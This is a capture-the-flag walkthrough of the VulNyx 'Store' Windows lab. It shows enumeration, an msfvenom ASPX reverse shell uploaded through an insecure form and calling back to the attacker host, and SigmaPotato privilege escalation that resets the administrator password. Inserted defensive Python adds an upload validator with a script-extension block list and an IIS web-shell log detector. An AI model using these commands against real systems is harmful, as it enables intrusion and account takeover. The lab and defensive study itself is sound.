VulNyx - Store
Information
Store is an easy-difficulty vulnerable Windows virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox hypervisor.

Enumeration
Nmap
TCP
root@kali:~ ❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.49
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-12 10:11 CEST
Nmap scan report for 192.168.1.49
Host is up (0.00030s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
root@kali:~ ❯ nmap -sVC -p80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 192.168.1.49
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-12 10:13 CEST
Nmap scan report for 192.168.1.49
Host is up (0.00063s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:BE:00:8D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-12T17:14:24
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 8h59m58s
|_nbstat: NetBIOS name: STORE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:be:00:8d (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Shell (iis apppool)
445/TCP (SMB)
Basic Enumeration
root@kali:~ ❯ netexec smb 192.168.1.49
SMB 192.168.1.49 445 STORE [*] Windows 10 / Server 2019 Build 17763 x64 (name:STORE) (domain:Store) (signing:False) (SMBv1:False)
Shares
Null Session (Failed)
root@kali:~ ❯ smbclient -NL //192.168.1.49
session setup failed: NT_STATUS_ACCESS_DENIED
root@kali:~ ❯ smbmap --no-banner -H 192.168.1.49 -u '' -p ''
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Something weird happened on (192.168.1.49) Error occurs while reading from remote(104) on line 1015
[*] Closed 1 connections
root@kali:~ ❯ netexec smb 192.168.1.49 -u '' -p '' --shares
SMB 192.168.1.49 445 STORE [*] Windows 10 / Server 2019 Build 17763 x64 (name:STORE) (domain:Store) (signing:False) (SMBv1:False)
SMB 192.168.1.49 445 STORE [-] Store\: STATUS_ACCESS_DENIED
SMB 192.168.1.49 445 STORE [-] Error enumerating shares: Error occurs while reading from remote(104)
RPC
Null Session (Failed)
root@kali:~ ❯ rpcclient -NU "" 192.168.1.49 -c "srvinfo"
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
80/TCP (HTTP)
Site (/)

Directory Brute Force
root@kali:~ ❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.49/ -b 404,400
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.49/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220544 / 220544 (100.00%)
===============================================================
Finished
===============================================================
Since the previous fuzzing with the usual wordlists returned no resources, I use a SecLists wordlist called IIS.txt, specific to Internet Information Services (IIS) servers, and succeed with the path /aspnet_files
root@kali:~ ❯ find /usr/share/seclists -name IIS.txt
/usr/share/seclists/Discovery/Web-Content/Web-Servers/IIS.txt
root@kali:~ ❯ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/Web-Servers/IIS.txt -u http://192.168.1.49/ -b 404,400,403 --no-error
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.49/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/Web-Servers/IIS.txt
[+] Negative Status codes: 404,400,403
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/aspnet_files/ (Status: 200) [Size: 1602]
/iisstart.htm (Status: 200) [Size: 703]
/iisstart.png (Status: 200) [Size: 99710]
Progress: 216 / 216 (100.00%)
===============================================================
Finished
===============================================================
Site (/aspnet_files/)
Directory Brute Force
root@kali:~ ❯ gobuster dir -w /opt/common.txt -u http://192.168.1.49/aspnet_files -b 404,400
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.49/aspnet_files
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 164] [--> http://192.168.1.49/aspnet_files/uploads/]
Progress: 4746 / 4746 (100.00%)
===============================================================
Finished
===============================================================
Insecure File Upload
I find a page that allows uploading images

Extensions Brute Force
Using Burp Suite's Intruder, I detect that it allows uploading files with the .aspx extension

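The root cause here is that the upload handler trusts the client-supplied filename and lets a server-side script extension through. The following is an added example, not code from the Store machine or from the VulNyx author, showing the validation a defender would want in front of an image upload: an extension allowlist checked against every dotted segment of the name (so double extensions do not slip past), an explicit deny list of extensions that IIS/ASP.NET would hand to a script handler, and a magic-byte check that the bytes really are the declared image type. The allow/deny lists and the `validate_upload` name are assumptions for the illustration; the real handler on this box is ASP.NET, and the same logic applies there.

```python
from typing import Tuple

# Allowed image types mapped to the magic-byte prefixes they must start with
# (constructed allowlist for this example; extend to the types the site actually needs).
ALLOWED = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}

# Extensions that IIS/ASP.NET would execute or that change server behaviour.
# Non-exhaustive; a deny list is only a backstop behind the allowlist above.
BLOCKED = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".config", ".cshtml"}


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for an uploaded image.

    Hypothetical helper for the example: the page only shows that the
    vulnerable handler accepted shell.aspx, not how it validated input.
    """
    # Strip any directory part the client may have sent (both separators).
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower().strip()
    if not name or name.startswith("."):
        return False, "empty or hidden filename"

    parts = name.split(".")
    if len(parts) < 2:
        return False, "no extension"

    # Inspect every dotted segment, not just the last one, so that
    # shell.aspx.png or shell.aspx;.png is still rejected. The ';' split
    # covers the classic IIS path-truncation trick.
    exts = ["." + p.split(";")[0] for p in parts[1:]]
    blocked_hits = [e for e in exts if e in BLOCKED]
    if blocked_hits:
        return False, "script extension present: " + ",".join(blocked_hits)

    final_ext = exts[-1]
    if final_ext not in ALLOWED:
        return False, "extension not allowed: " + final_ext

    # The declared type must match the actual bytes; a .png that begins
    # with '<%@ Page' is not an image.
    if not any(data.startswith(magic) for magic in ALLOWED[final_ext]):
        return False, "content does not match declared type " + final_ext

    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs: a genuine PNG header and an ASPX page directive.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    aspx = b"<%@ Page Language=\"C#\" %>"
    for fname, blob in [("cat.png", png), ("shell.aspx", aspx),
                        ("shell.aspx.png", png), ("fake.png", aspx)]:
        print(fname, validate_upload(fname, blob))
```

Even with this check in place, the stored file should be written under a server-generated name into a directory where script execution is disabled; validation reduces the attack surface, the execution restriction removes the consequence.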
Generate Payload (ASPX)
Using netexec I verify the target server's architecture: it is an x64-based system
root@kali:~ ❯ netexec smb 192.168.1.49
SMB 192.168.1.49 445 STORE [*] Windows 10 / Server 2019 Build 17763 x64 (name:STORE) (domain:Store) (signing:False) (SMBv1:False)
With msfvenom I generate a reverse shell with the .aspx extension for Internet Information Services (IIS)
root@kali:~ ❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.5 LPORT=443 -f aspx -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3388 bytes
Saved as: shell.aspx
Reverse Shell
root@kali:~ ❯ curl -sX GET "http://192.168.1.49/aspnet_files/uploads/shell.aspx"
I obtain a shell as the user iis apppool
root@kali:~ ❯ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.49] 49671
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami & hostname
iis apppool\defaultapppool
Store
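From the defender's side, the chain above leaves a clear trace in the IIS W3C access log: a POST to the upload page from one client, followed by a successful GET of a script extension inside the uploads directory. The following is an added example, not part of the original writeup, that parses the `#Fields:` header of a W3C log and flags exactly that pattern. The log lines are constructed for the example (the field order, user agents and timestamps are assumptions); the `/aspnet_files/uploads/` path and the `shell.aspx` name come from the writeup.

```python
from typing import Dict, List, Tuple

# Extensions that IIS hands to a script handler; a 200 for one of these
# under an upload directory is a web shell indicator.
SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx")
UPLOAD_DIRS = ("/aspnet_files/uploads/",)

# Constructed IIS W3C log excerpt for the example (not captured from the machine).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2025-10-12 08:20:01 192.168.1.49 GET /aspnet_files/ - 80 - 192.168.1.5 Mozilla/5.0 200 12
2025-10-12 08:20:15 192.168.1.49 POST /aspnet_files/default.aspx - 80 - 192.168.1.5 Mozilla/5.0 200 40
2025-10-12 08:20:30 192.168.1.49 GET /aspnet_files/uploads/photo.png - 80 - 192.168.1.7 Mozilla/5.0 200 3
2025-10-12 08:20:45 192.168.1.49 GET /aspnet_files/uploads/missing.aspx - 80 - 192.168.1.7 Mozilla/5.0 404 2
2025-10-12 08:21:02 192.168.1.49 GET /aspnet_files/uploads/shell.aspx - 80 - 192.168.1.5 curl/8.5.0 200 1500
"""


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Turn W3C extended log text into one dict per request, keyed by the #Fields names."""
    fields = None
    rows = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # field names follow the directive
            continue
        if not line or line.startswith("#"):
            continue                        # other directives and blank lines
        values = line.split()
        # W3C logs are space-separated with '-' for empty values, so the
        # counts line up unless the line is truncated; skip malformed rows.
        if fields and len(values) == len(fields):
            rows.append(dict(zip(fields, values)))
    return rows


def find_webshell_indicators(rows: List[Dict[str, str]]) -> List[Tuple[str, str, str, str]]:
    """Return (timestamp, client, path, reason) for script executions under an upload dir."""
    findings = []
    last_post: Dict[str, str] = {}          # client IP -> time of its most recent POST
    for r in rows:
        path = r["cs-uri-stem"].lower()
        client = r["c-ip"]
        if r["cs-method"] == "POST":
            last_post[client] = r["time"]
        in_uploads = path.startswith(UPLOAD_DIRS)
        if in_uploads and path.endswith(SCRIPT_EXTS) and r["sc-status"] == "200":
            reason = "script served from upload directory"
            if client in last_post:
                reason += " after POST at " + last_post[client] + " from same client"
            findings.append((r["date"] + " " + r["time"], client, path, reason))
    return findings


if __name__ == "__main__":
    for hit in find_webshell_indicators(parse_w3c(SAMPLE_LOG)):
        print(hit)
```

The 404 for `missing.aspx` is deliberately not flagged: the rule keys on a successful response, since a failed probe of the uploads directory is noise whereas a 200 means the handler actually ran the file. On a real server the same rule should fire once, because script execution in the uploads directory should be disabled and the request should never return 200.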
Privilege Escalation
Enumeration
Privileges
The iis apppool user has the SeImpersonatePrivilege privilege
c:\>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
OS & Kernel
I verify again that I am facing a Windows Server 2019 (x64) operating system
c:\>systeminfo
Host Name: STORE
OS Name: Microsoft Windows Server 2019 Standard Evaluation
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00431-10000-00000-AA871
Original Install Date: 10/10/2025, 10:19:36 AM
System Boot Time: 10/12/2025, 10:10:53 AM
System Manufacturer: innotek GmbH
System Model: VirtualBox
System Type: x64-based PC
Abuse
SeImpersonatePrivilege
I use SigmaPotato to escalate privileges; I download the compiled binary from the repository
File Transfer
root@kali:~ ❯ mv /home/kali/Downloads/SigmaPotato.exe .
root@kali:~ ❯ impacket-smbserver a . -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
c:\>cd %TEMP%
C:\Windows\Temp>copy \\192.168.1.5\a\SigmaPotato.exe SigmaPotato.exe
1 file(s) copied.
Run SigmaPotato
I run SigmaPotato.exe and change the administrator user's password
C:\Windows\Temp>.\SigmaPotato.exe "net user administrator Password1"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 732 | Token: 0x796 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 948
[+] Current Command Length: 32 characters
[+] Creating Process via 'CreateProcessAsUserW'
[+] Process Started with PID: 1776
[+] Process Output:
The command completed successfully.
I verify the new credentials and log in as the administrator user
root@kali:~ ❯ netexec smb 192.168.1.49 -u 'administrator' -p 'Password1'
SMB 192.168.1.49 445 STORE [*] Windows 10 / Server 2019 Build 17763 x64 (name:STORE) (domain:Store) (signing:False) (SMBv1:False)
SMB 192.168.1.49 445 STORE [+] Store\administrator:Password1 (Pwn3d!)
root@kali:~ ❯ netexec winrm 192.168.1.49 -u 'administrator' -p 'Password1' 2>/dev/null
WINRM 192.168.1.49 5985 STORE [*] Windows 10 / Server 2019 Build 17763 (name:STORE) (domain:Store)
WINRM 192.168.1.49 5985 STORE [+] Store\administrator:Password1 (Pwn3d!)
root@kali:~ ❯ evil-winrm -i 192.168.1.49 -u 'administrator' -p 'Password1'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami ; hostname
store\administrator
Store
Flags
Now as the administrator user, I can read the user.txt and root.txt flags
*Evil-WinRM* PS C:\> type c:\users\user.txt
7ed*****************************
*Evil-WinRM* PS C:\> type c:\users\administrator\desktop\root.txt
d667****************************
That concludes the resolution of the Store machine.
Happy Hacking!